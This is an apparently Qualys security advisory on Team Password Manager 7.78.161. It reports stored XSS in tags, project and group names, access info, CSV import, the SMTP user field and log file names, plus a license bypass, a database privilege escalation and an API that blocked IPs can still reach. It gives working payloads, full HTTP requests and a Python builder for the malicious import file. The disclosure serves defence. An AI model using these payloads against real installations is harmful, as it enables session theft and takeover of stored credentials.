Qualys Security Advisory QSA-2018-03-08 


March 08, 2018 


Team Password Manager Multiple Security Vulnerabilities 


SYSTEM INFORMATION: 
Version: 7.78.161 


Vendor URL : http://teampasswordmanager.com/ 


VULNERABILITY DETAILS 


Vulnerability #1: Stored Cross-site Scripting — Password Tag 


A stored cross-site scripting vulnerability exists in the password tags field. A user who can create or modify a password can assign tags to it; a tag containing script is stored unencoded and executes whenever a page that renders the tag is loaded in the browser. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/pwd/aj_edit_save/0 


Parameters: tags, hidden_tags 


Normal user, Project Manager and IT user roles have permission to create new passwords in their assigned projects, so any of them can plant the payload. Using this vulnerability an attacker can take control of the application by stealing the session cookie of any logged-in user, including the 'admin' user. 


How to reproduce: 


1. Click the "New Password" button. 
2. Select any project. 
3. Add the following script in the "Tag" field and press Enter or comma (,): 
"> <script>alert(document.cookie) </script> 


POST /tpm/index.php/pwd/aj_edit_save/0 HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<server ip>/tpm/index.php/pwd/view/20
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 462
Cookie: PHPSESSID=<session id>
Connection: close

csrft=<token>&project_id=16&password_id=0&name=newpass&tags=&hidden_tags=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&access_info=https%3A%2F%2Fwww.facebook.com&fa[...]utofill2=&email=user1%40user.com&fakepwddonotautofill1=&password=abcd1234&password_visible=abcd1234&fakepwddonotautofill2=&repeat_password=abcd1234&repeat_p[...]


4. The next time that project is opened, an alert box shows the session cookie. 


[Screenshot: TPM project page (Home / Users/Groups / Log / Settings menu, Filter Tree sidebar) with an alert box showing PHPSESSID=nv84kp0Soidbrcughb4cevSek5]


Vulnerability #2: Stored Cross-site Scripting — Project Tag 


A stored cross-site scripting vulnerability exists in the project and subproject tags field. A user who can create or modify a project can assign tags to it; a tag containing script is stored unencoded and executes whenever a page that renders the tag is loaded in the browser. 


URL: http://<server ip>/<tpm path>/index.php/prj/aj_edit_save/0 


Parameters: tags, hidden_tags 


RISK FACTOR: High 


Project Manager and IT user roles have permission to create new projects and subprojects within their assigned projects, so either can plant the payload. Using this vulnerability an attacker can take control of the whole application by stealing the session cookie of any logged-in user, including the 'admin' user. 


How to reproduce: 


1. Click the "New Project" button. 

2. Fill in the project name. 

3. Add the following script in the "Tag" field and press Enter or comma (,): 
"> <script>alert(document.cookie) </script> 


POST /tpm/index.php/prj/aj_edit_save/0 HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<server ip>/tpm/index.php/pwd/view/45
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 175
Cookie: PHPSESSID=<session id>
Connection: close

csrft=<token>&project_id=0&parent_id=0&name=newproject&tags=&hidden_tags=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&notes=new+project


4. The next time the project list is displayed, an alert box shows the session cookie. 


[Screenshot: browser at /index.php/prj/view/16 (Home / Users/Groups / Log / Settings menu, Filter Tree sidebar) with an alert box showing PHPSESSID=98996n100jk3nno0hcj13gccr5; TPM_LANG=ssssss]


Vulnerability #3: Stored Cross-site Scripting — Project Name 


A stored cross-site scripting vulnerability exists in the project and subproject name field. A user who can create or modify a project can inject markup into the name, which executes when the password pages that display the project name are loaded. 


URL: http://<server ip>/<tpm path>/index.php/prj/aj_edit_save/0 


Parameter: name 


RISK FACTOR: High 


Project Manager and IT user roles have permission to create new projects and subprojects within their assigned projects, so either can plant the payload. Using this vulnerability an attacker can take control of the whole application by stealing the session cookie of any logged-in user, including the 'admin' user. 


How to reproduce: 


1. Click the "New Project" button. 
2. Add the following in the "Name" field and fill in the other details: 
" onclick=alert(document.cookie) tag 


POST /tpm/index.php/prj/aj_edit_save/0 HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<server ip>/tpm/index.php/prj/view/44
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 143
Cookie: PHPSESSID=<session id>; TPM_LANG=en
Connection: close

csrft=<token>&project_id=0&parent_id=0&name=%22+onclick%3Dalert(document.cookie)+tag&tags=&hidden_tags=&notes=


3. Open the project created above. 
4. Click the "New Password" button. 
5. Fill in all fields on the New Password page and submit it. 
6. Go to the view of all passwords. 
7. Click the project created above; an alert box pops up with the session cookie. 
[Screenshot: browser at /index.php/pwd/all with an alert box showing PHPSESSID=f2gluf6kcmmcfqurShl1th8074; TPM_LANG=en]


Vulnerability #4: Stored Cross-site Scripting — Password Access Information 


A stored cross-site scripting vulnerability exists in the password access information field. A user who can create or modify a password can set its access information; markup injected there executes when the password pages are loaded. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/pwd/aj_edit_save/0 
Parameters: access_info 


Normal user, Project Manager and IT user roles have permission to create new passwords in their assigned projects, so any of them can plant the payload. Using this vulnerability an attacker can take control of the whole application by stealing the session cookie of any logged-in user, including the 'admin' user. 


How to reproduce: 


1. Click the "New Password" button. 
2. Select any project. 
3. Add the following in the "Access" field and fill in the other details: 


http://www.test.com/"<img src=a onerror=alert(document.cookie)> 


POST /tpm/index.php/pwd/aj_edit_save/0 HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Referer: http://<server ip>/tpm/index.php/prj/view/46
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=<session id>; TPM_LANG=en
Connection: close

csrft=<token>&project_id=46&password_id=0&name=newpass&tags=&hidden_tags=&access_info=[...]&faketextdonotautofill1=&username=&faketextdonotautofill2=&email=&fakepwddonotautofill1=&password=&password_visible=&fakepwddonotautofill2=&repeat_password=&repeat_password_visibl[...]


4. The next time the project is opened or all passwords are viewed, the payload executes and an alert box is shown. 


[Screenshot: browser at /index.php/pwd/active with an alert box showing PHPSESSID=f2glufékemmcfqur5hi1th8074; TPM_LANG=en]
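Vulnerabilities #1, #3 and #4 share one root cause: a stored value (tag, project name, access information) is written into HTML without output encoding, so a value that closes the attribute or element it sits in becomes markup. The following Python snippet is an added illustration, not code from the advisory or from Team Password Manager: the rendering functions are an assumption about what the template does, chosen to reproduce the observed behaviour, and the "safe" variant shows the fix (context-appropriate HTML encoding). The payloads are the ones used in the steps above; the counter uses the standard-library HTML parser to show what an HTML parser actually sees in each case.

```python
import html
from html.parser import HTMLParser

# Payloads taken from this advisory: the tag payload of vulnerability #1 and
# the attribute-context payload of vulnerability #3.
TAG_PAYLOAD = '"> <script>alert(document.cookie) </script>'
NAME_PAYLOAD = '" onclick=alert(document.cookie) tag'


def render_unsafe(value):
    """Hypothetical rendering that reproduces the observed behaviour: the stored
    value is concatenated into an attribute and into element content without
    encoding. It is an assumption about the template, not TPM's own code."""
    return '<a class="tag" title="' + value + '">' + value + '</a>'


def render_safe(value):
    """Hardened form: HTML-encode for the attribute and text contexts the value
    is written into. quote=True also encodes the double and single quote, which
    is what defeats the attribute breakout in the onclick payload."""
    enc = html.escape(value, quote=True)
    return '<a class="tag" title="' + enc + '">' + enc + '</a>'


class _InjectionCounter(HTMLParser):
    """Counts the script elements and on* event-handler attributes that an
    HTML parser actually sees in the rendered markup."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.event_handlers += sum(1 for name, _ in attrs if name.startswith("on"))


def count_injected(markup):
    """Return (script elements, event-handler attributes) found in markup."""
    parser = _InjectionCounter()
    parser.feed(markup)
    parser.close()
    return parser.script_tags, parser.event_handlers


if __name__ == "__main__":
    for payload in (TAG_PAYLOAD, NAME_PAYLOAD):
        print("unsafe:", count_injected(render_unsafe(payload)))
        print("safe:  ", count_injected(render_safe(payload)))
```

The same encoding rule applies to every sink listed later in this advisory (group name, SMTP user, uploaded file name in the log, imported CSV columns): encode at output time for the context the value lands in, rather than trying to filter the input.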


Vulnerability #5: Stored Cross-site Scripting — Import Passwords 


A stored cross-site scripting vulnerability exists in the import passwords functionality. All of the vulnerabilities described above can also be triggered through it: the feature imports passwords and their attributes from a CSV file, and if the file contains the respective payloads they are stored unencoded and execute from three different locations (project name, access information and tags). 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/settings/import_upload 


Parameter: access_info, tags, name 


If a user uploads a CSV file containing these payloads, the application can be exploited and full control obtained through the 'admin' role. 


How to reproduce: 


1. Create a CSV file in the format given on the CSV help page. 
2. Put the payloads in the respective columns. Below are sample CSV rows, one per payload, each followed by the upload request that carries it. 

Project Name Payload 


" onclick=alert(1) tag,ddd 


POST /tpm/index.php/settings/import_upload HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<server ip>/tpm/index.php/settings/import
Content-Type: multipart/form-data; boundary=---------------------------2084248252280
Content-Length: 465
Cookie: PHPSESSID=<session id>; TPM_LANG=en
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------2084248252280
Content-Disposition: form-data; name="csrft"

<token>
-----------------------------2084248252280
Content-Disposition: form-data; name="parent_id"


-----------------------------2084248252280
Content-Disposition: form-data; name="userfile"; filename="a.csv"
Content-Type: application/vnd.ms-excel

""" onclick=alert(1) tag",ddd
-----------------------------2084248252280--


Password Access Information Payload 


Myproject,ddd,http://www.google.com/"<img src=a onerror=alert(2)> 


POST /tpm/index.php/settings/import_upload HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<server ip>/tpm/index.php/settings/import
Content-Type: multipart/form-data; boundary=---------------------------12258119750
Content-Length: 496
Cookie: PHPSESSID=<session id>; TPM_LANG=en
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------12258119750
Content-Disposition: form-data; name="csrft"

<token>
-----------------------------12258119750
Content-Disposition: form-data; name="parent_id"


-----------------------------12258119750
Content-Disposition: form-data; name="userfile"; filename="a.csv"
Content-Type: application/vnd.ms-excel

Myproject,ddd,"http://www.google.com/""<img src=a onerror=alert(2)>"
-----------------------------12258119750--


Password Tags Payload 


Myproject,ddd,http://www.youtube.com/,User1,,test,Notes,"><svg onload=alert(2)> 


POST /tpm/index.php/settings/import_upload HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<server ip>/tpm/index.php/settings/import
Content-Type: multipart/form-data; boundary=---------------------------219892077112208
Content-Length: 526
Cookie: PHPSESSID=<session id>; TPM_LANG=en
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------219892077112208
Content-Disposition: form-data; name="csrft"

<token>
-----------------------------219892077112208
Content-Disposition: form-data; name="parent_id"


-----------------------------219892077112208
Content-Disposition: form-data; name="userfile"; filename="a.csv"
Content-Type: application/vnd.ms-excel

Myproject,ddd,http://www.youtube.com/,User1,,test,Notes,"""><svg onload=alert(2)>"
-----------------------------219892077112208--


3. Upload the file from the Import Passwords page. 

4. The next time the respective project is opened or all passwords are viewed, the payload executes. 


[Screenshot: project name payload executing on /index.php/pwd/active]

[Screenshot: password access information payload executing on /index.php/pwd/active]

[Screenshot: password tags payload executing on the project view page]


Vulnerability #6: Stored Cross-site Scripting — My Passwords Access Information 


A stored cross-site scripting vulnerability exists in the password access information field on the "My Passwords" page, which every user has. A user can create or modify a personal password and set its access information; markup injected there executes when the password pages are loaded. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/mypwd/edit/<pwdid> 


Parameter: access_info 
How to reproduce: 


1. Go to the "My Passwords" page via the link in the upper right-hand corner (near the logout button). 

2. Click "New Password". 

3. Add the following in the "Access" field and fill in the other details: 
http://www.test.com/"<svg onload=alert(10)> 


POST /tpm/index.php/mypwd/edit/12 HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<server ip>/tpm/index.php/mypwd/edit/12
Content-Type: application/x-www-form-urlencoded
Content-Length: 250
Cookie: PHPSESSID=<session id>; TPM_LANG=AAAAAAAAAA
Connection: close


4. When a user views passwords via the "All Passwords" link, the code above executes. 




Vulnerability #7: Stored Cross-site Scripting — Import My Passwords 


A stored cross-site scripting vulnerability exists in the import functionality of the My Passwords page. The vulnerability described above can also be triggered through it: the feature imports passwords and their attributes from a CSV file, and if the file contains the respective payloads they are stored unencoded and execute from the password pages. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/mysettings/import_upload 


Parameter: access_info, tags 
How to reproduce: 


1. Create a CSV file in the format given on the CSV help page. 

2. Put the payload in the respective column. Below is a sample row carrying the access information payload. 

3. Go to the "My Passwords" page via the link in the upper right-hand corner (near the logout button). 

4. Click "My Settings" and navigate to "Import My Passwords". 

5. Upload the CSV created above: 


Password Access Information Payload 


http://www.facebook.com/"<iframe onload=alert(5)> 


POST /tpm/index.php/mysettings/import_upload HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<server ip>/tpm/index.php/mysettings/import
Content-Type: multipart/form-data; boundary=---------------------------46572859523195
Content-Length: 417
Cookie: PHPSESSID=<session id>; TPM_LANG=AAAAAAAAAA
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------46572859523195
Content-Disposition: form-data; name="csrft"

<token>
-----------------------------46572859523195
Content-Disposition: form-data; name="userfile"; filename="a.csv"
Content-Type: application/vnd.ms-excel

mypass,"http://www.facebook.com/""<iframe onload=alert(5)>"
-----------------------------46572859523195--


6. When a user views passwords via the "All Passwords" link, the code above executes. 


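The CSV rows for vulnerabilities #5 and #7 have to be quoted correctly for the import parser to keep the payload intact: a field containing a double quote is wrapped in quotes and the embedded quote is doubled, which is exactly the form visible in the captured upload bodies above. The Python script below is added here and is not part of the advisory or of Team Password Manager. It builds such a file from the three payload rows of vulnerability #5 (the single-row form used on My Passwords in vulnerability #7 is handled the same way) and wraps it in the multipart/form-data body that the import_upload endpoints receive. The column order is taken from the advisory's sample rows rather than from the product's documentation, and the csrft value and boundary are placeholders.

```python
import csv
import io

# Column order as shown in this advisory's sample rows (project, password name,
# access information, username, e-mail, password, notes, tags). It is taken
# from the samples above, not from the product's CSV documentation.
PAYLOAD_ROWS = [
    ['" onclick=alert(1) tag', "ddd"],                                            # project name
    ["Myproject", "ddd", 'http://www.google.com/"<img src=a onerror=alert(2)>'],  # access info
    ["Myproject", "ddd", "http://www.youtube.com/", "User1", "", "test", "Notes",
     '"><svg onload=alert(2)>'],                                                   # tags
]


def build_import_csv(rows):
    """Serialise rows RFC 4180 style: a field containing a double quote or a
    comma is wrapped in quotes and embedded quotes are doubled, which is the
    encoding visible in the captured upload bodies."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_MINIMAL, lineterminator="\n")
    writer.writerows(rows)
    return buf.getvalue()


def build_multipart(fields, filename, file_bytes, boundary):
    """Build the multipart/form-data body for settings/import_upload or
    mysettings/import_upload: the text fields first, then the userfile part.
    The boundary is whatever the caller chooses; it must not occur in the data."""
    out = bytearray()
    for name, value in fields.items():
        out += (f"--{boundary}\r\nContent-Disposition: form-data; name=\"{name}\"\r\n\r\n"
                f"{value}\r\n").encode()
    out += (f"--{boundary}\r\nContent-Disposition: form-data; name=\"userfile\"; "
            f"filename=\"{filename}\"\r\nContent-Type: application/vnd.ms-excel\r\n\r\n").encode()
    out += file_bytes + b"\r\n"
    out += f"--{boundary}--\r\n".encode()
    return bytes(out)


def content_type_header(boundary):
    """Value of the Content-Type request header that matches build_multipart()."""
    return f"multipart/form-data; boundary={boundary}"


if __name__ == "__main__":
    csv_text = build_import_csv(PAYLOAD_ROWS)
    print(csv_text)
    # Placeholder values: a real request needs the csrft token from the import
    # page and the PHPSESSID cookie of the logged-in user.
    body = build_multipart({"csrft": "<token>", "parent_id": ""},
                           "a.csv", csv_text.encode(), "----TPMImportBoundary")
    print(content_type_header("----TPMImportBoundary"))
    print(body.decode())
```

The script only produces the file and the request body; sending it (for example with urllib or curl, with the session cookie and csrft token from a logged-in browser) is left to the tester. The point to take from it is that the CSV quoting layer is transparent: whatever the import parser stores is rendered unencoded on the same pages as the hand-entered values, so the import path needs the same output encoding fix, not a separate filter.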


Vulnerability #8: Stored Cross-site Scripting — My Password Tag 


A stored cross-site scripting vulnerability exists in the My Passwords tags field. A user who can create or modify a personal password can assign tags to it; a tag containing script is stored unencoded and executes whenever a page that renders the tag is loaded in the browser. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/mypwd/edit/0 


Parameters: tags, hidden_tags 


Normal user, Project Manager and IT user roles can all create personal passwords on the My Passwords page and then copy or move them into a project they are assigned to, so any of them can plant the payload where other users see it. Using this vulnerability an attacker can take control of the whole application by stealing the session cookie of any logged-in user, including the 'admin' user. 


How to reproduce: 


1. Click the "New Password" button. 

2. Select any project. 

3. Add the following script in the "Tag" field and press Enter or comma (,): 
"> <script>alert(document.cookie) </script> 


POST /tpm/index.php/mypwd/edit/0 HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<server ip>/tpm/index.php/mypwd/add
Content-Type: application/x-www-form-urlencoded
Content-Length: 256
Cookie: PHPSESSID=<session id>; TPM_LANG=<value>
Connection: close
Upgrade-Insecure-Requests: 1

csrft=<token>&password_id=0&name=newpass&tags=&hidden_tags=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&access_info=test&faketextdonotautofill1=&username=&faketextdonotautofill2=&email=&fakepwddonotautofill1=&password=&password_visible=&fakepwddonotautofill2=&repeat_password=&repeat_password_vis[...]


4. Copy or move the password into a project. 
5. The next time that project is opened, an alert box shows the session cookie. 


[Screenshot: browser at 192.168.0.8/tpm/index.php/prj/view/66 with an alert box showing PHPSESSID=ed2rqb68stdqcfr86etfor3105 and the "Prevent this page from creating additional dialogs" checkbox]


Vulnerability #9: Stored Cross-site Scripting — Group Name 


A stored cross-site scripting vulnerability exists in the group name field. A user who can create or modify a group and add users to it can inject script into the group name, which executes whenever a page that renders the name is loaded in the browser. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/groups/edit/<group_id> 


Parameter: name 


How to Reproduce: 


1. Add a group with the name: "><script>alert('xxx')</script> 


POST /tpm/index.php/groups/edit/4 HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<server ip>/tpm/index.php/groups/edit/4
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Cookie: PHPSESSID=<session id>; TPM_LANG=ffffffffff
Connection: close
Upgrade-Insecure-Requests: 1

csrft=<token>&group_id=4&name=%22%3E%3Cscript%3Ealert%28%27xxx%27%29%3C%2Fscript%3E


2. Assign one user to the group. 

3. Go to the Users/Groups tab. 

4. Open that user's data page. The page shows all of the user's information, and from here an admin or IT user can remove the user from groups. 

5. When the admin or IT user clicks the cross sign next to the group, the application redirects to a different page and the payload executes, as shown below: 


[Screenshot: user data page (Data / Log / Passwords / Projects tabs) for Username: a, E-mail address: a@acd.com, Role: IT, Language: not set (default en - English); the Groups field shows the injected group name next to the remove (x) control and the "Add the User to a Group" button]


Vulnerability #10: Stored Cross-site Scripting — Group Name (Project Security Page) 


The same injected group name also executes from the project security page. A user who can create or modify a group and add users to it can inject script into the group name, which executes whenever a page that renders the name is loaded in the browser. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/prj/getmembers/<group id> 


Parameter: name 
How to Reproduce: 


1. Add a group with the name: "><script>alert('xxx')</script> 


POST /tpm/index.php/groups/edit/4 HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://<server ip>/tpm/index.php/groups/edit/4
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Cookie: PHPSESSID=<session id>; TPM_LANG=ffffffffff
Connection: close
Upgrade-Insecure-Requests: 1

csrft=<token>&group_id=4&name=%22%3E%3Cscript%3Ealert%28%27xxx%27%29%3C%2Fscript%3E


2. Open any project's page. 
3. Click the Security button. 


[Screenshot: project page for "PMproject" with the Edit, Notes, Upload File and Security buttons and the Data / Security / Log tabs]


4. On the Security page, click the Groups tab. This tab lists all groups created in the application. 


[Screenshot: Security tab of the project page, next to the Custom Fields, Locking, Ext. Sharing, Duplicate, Copy and Move tabs, listing the groups]


5. Hover the mouse over the "members" link beside the group created above. When the mouse is over the link, the application sends an Ajax request (prj/getmembers/<group id>) to fetch the group's member list, and the payload stored in the group name field executes. 


Vulnerability #11: Stored Cross-site Scripting — Email Configuration 


A stored cross-site scripting vulnerability exists in the SMTP user field of the SMTP configuration page. A user who can add or modify the SMTP configuration can inject script into the SMTP user field, which executes whenever a page that renders the value is loaded in the browser. 


RISK FACTOR: 


URL: http://<server ip>/<tpm path>/index.php/settings/edit_mail_config 
Parameter: eus 
How to Reproduce: 


1. Go to the Settings tab. 

2. Click the Email link on the left-hand side. 

3. Click SMTP Server Configuration. 

4. Enter the following in the SMTP User field: 
<img src=a onerror=alert('smtperror')> 

5. Check the checkbox "Use the SMTP User as the email sender (otherwise it will use the email of the user). If selected, the SMTP User must be an email address." 

6. Fill in the remaining details on the page and save it. 


[Screenshot: SMTP configuration form with SMTP Host localhost ("Leave blank to delete SMTP configuration"), TLS/SSL Encryption (none), SMTP Port 25, the payload in the SMTP User field, a masked SMTP Password and the "Use the SMTP User as the email sender" checkbox ticked]


7. Click the "Send test email (to yourself)" button. 
8. The payload executes and an alert box reading "smtperror" is shown. 


Vulnerability #12: Stored Cross-site Scripting —Additional Data in Log 


A stored cross-site scripting vulnerability exists in the activity log. Whenever a user uploads a file through a project or password page, a log entry containing the file name is generated and shown in the Log tab. A user can inject script into the file name, which executes whenever the log page is loaded in the browser. 


RISK FACTOR: High 


URL: http://<server ip>/<tpm path>/index.php/files/do_upload/pwd/<pwd id>/js 


http://<server ip>/<tpm path>/index.php/files/do_upload/prj/<project id>/js 


Parameter: filename 
How to Reproduce: 


1. Go to a project and click Upload File. 

2. Click Browse and select a file to upload. 

3. Start Burp intercept and click Upload. 

4. Put the XSS payload in the filename field, as below: 


POST /tpm/index.php/files/do_upload/prj/3/js HTTP/1.1
Host: <server ip>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 481
Content-Type: multipart/form-data; boundary=---------------------------285162711510935
Cookie: PHPSESSID=<session id>
Connection: close

-----------------------------285162711510935
Content-Disposition: form-data; name="userfile"; filename="><img src=x onerror=alert(upload-file-delete-XSS)>"
Content-Type: text/plain

ifdsfsdfsdf
-----------------------------285162711510935
Content-Disposition: form-data; name="notes"


-----------------------------285162711510935
Content-Disposition: form-data; name="csrft"

<token>
-----------------------------285162711510935--


5. Open the Log tab; the payload executes. 


[Screenshot: "Activity Log | Team Password Manager" at /index.php/alog with an alert box reading "upload-file-delete-XSS"]


6. The payload executes for every logged file action: Upload File, Edit File Notes, View File Notes and Delete File. 


Vulnerability #13: License Bypass 

Anyone with access to the database can bypass the licensed number of users. 

RISK FACTOR: 

How to Reproduce: 


1. Create users and deactivate few of them. 


[Screenshot: Users list (filters by State, Role and Group; Total rows: 6) showing Admin (admin, Admin role), test1 (abcd@scd.com, inactive), newact (dd@c.com, active), test (abcd@123.com, Normal user), userenum (Project manager) and Ghost User (ghost@localhost.localdomain, Read only)]


2. The application now allows further users to be created, because only active users count against the license. 


3. In the database, set the 'active' column of the 'wmm_users' table to 1 for all of the deactivated users. 


4. The application now has more active users than the license permits. 


[Screenshot: Users list (Total rows: 6) with every user, including test1 (abcd@scd.com, IT) and newact (dd@c.com, IT), now shown as Active; the page displays a license warning pointing to http://teampasswordmanager.com/buy. Footer: Team Password Manager - teampasswordmanager.com - EULA and other licenses - Help - Advanced Search Help]


Vulnerability #14: Privilege Escalation 


A valid user who also has access to the database can escalate their role by changing a single value in the 'wmm_users' table. 


TPM is a password management application and may hold credentials for many projects or departments. The team operating the underlying operating system and database should not be able to reach other projects' credentials by any route. 


Through this issue a user who controls the backend database can modify their own permission level and log in to TPM as an "admin" user. This gives full control of the application and access to every project credential stored in it. 


RISK FACTOR: Medium 
How to Reproduce: 


1. Create one user with minimum privileges (here 'newact' with the Read only role). 


[Screenshot: user data page for newact (E-mail address: dd@c.com, Name: newact, Role: Read only, Language: not set (default en - English), no groups)]


2. In the database, change the value that stores this user's role in the 'wmm_users' table to the admin role. 


3. The 'newact' user now has admin privileges. 


[Screenshot: user data page for newact (E-mail address: dd@c.com, Name: newact, Role: Admin, Language: not set (default en - English), no groups)]


Vulnerability #15: API Access from Blocked IP 


The web application denies access to an IP address that has been blocked on the 'IP address blocking' page, but the same application resources remain reachable through the API from that address. 


RISK FACTOR: Medium 
How to Reproduce: 


1. Block an IP address on the 'IP address blocking' page. 


[Screenshot: Settings > IP Address Blocking Configuration (Blocked IP Addresses / Automatic Blocking Settings tabs). "Your IP address: 192.168.0.6". The blocked list contains one entry of type Manual, created by admin on Mar 10, 2018 13:00 (Total rows: 1). Footer: Team Password Manager - teampasswordmanager.com - EULA and other licenses - Help - Advanced Search Help]


2. Try to access the web application from the blocked IP. A 403 page is shown. 


[Screenshot: browser at http://192.168.0.8/tpm/ showing "Error: Access Forbidden (Error 403)". A Kali terminal running ifconfig shows the client's address is 192.168.0.7 on eth0 (netmask 255.255.255.0, broadcast 192.168.0.255)]


3. Access application resources through the API from the blocked IP. The application serves them; the block applies only to the web interface. 


[Screenshot: API response from 192.168.0.8 returned to the blocked client 192.168.0.7]
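Because the block is enforced by the web interface rather than in front of the application, the gap only shows up if the API route is checked separately. The Python check below is added here and is not part of the advisory or of Team Password Manager: it scans web-server access log lines for addresses on the block list that received 403 on the user interface but a successful status on an API path, which is the pattern the three steps above produce. The log lines are constructed for the example, and the API path prefix is an assumption (the advisory does not give the API's URL), so it is a parameter.

```python
import re

# Constructed sample lines in Apache "combined" format. They are not from the
# advisory; they model the behaviour it describes: the blocked address
# 192.168.0.7 gets 403 on the web UI but 200 on API requests, while an
# unblocked address (192.168.0.6) uses the UI normally.
SAMPLE_LOG = """\
192.168.0.7 - - [10/Mar/2018:13:02:11 +0000] "GET /tpm/ HTTP/1.1" 403 512 "-" "Mozilla/5.0"
192.168.0.7 - - [10/Mar/2018:13:02:40 +0000] "GET /tpm/index.php/api/v4/projects.json HTTP/1.1" 200 2048 "-" "curl/7.58.0"
192.168.0.7 - - [10/Mar/2018:13:02:41 +0000] "GET /tpm/index.php/api/v4/passwords/12.json HTTP/1.1" 200 910 "-" "curl/7.58.0"
192.168.0.6 - - [10/Mar/2018:13:03:05 +0000] "GET /tpm/index.php/pwd/all HTTP/1.1" 200 7331 "-" "Mozilla/5.0"
"""

# Assumed API prefix; TPM's real API path is not stated in the advisory.
DEFAULT_API_PREFIX = "/tpm/index.php/api/"

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_access_log(text):
    """Yield one dict per parseable line; lines that do not match are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            yield rec


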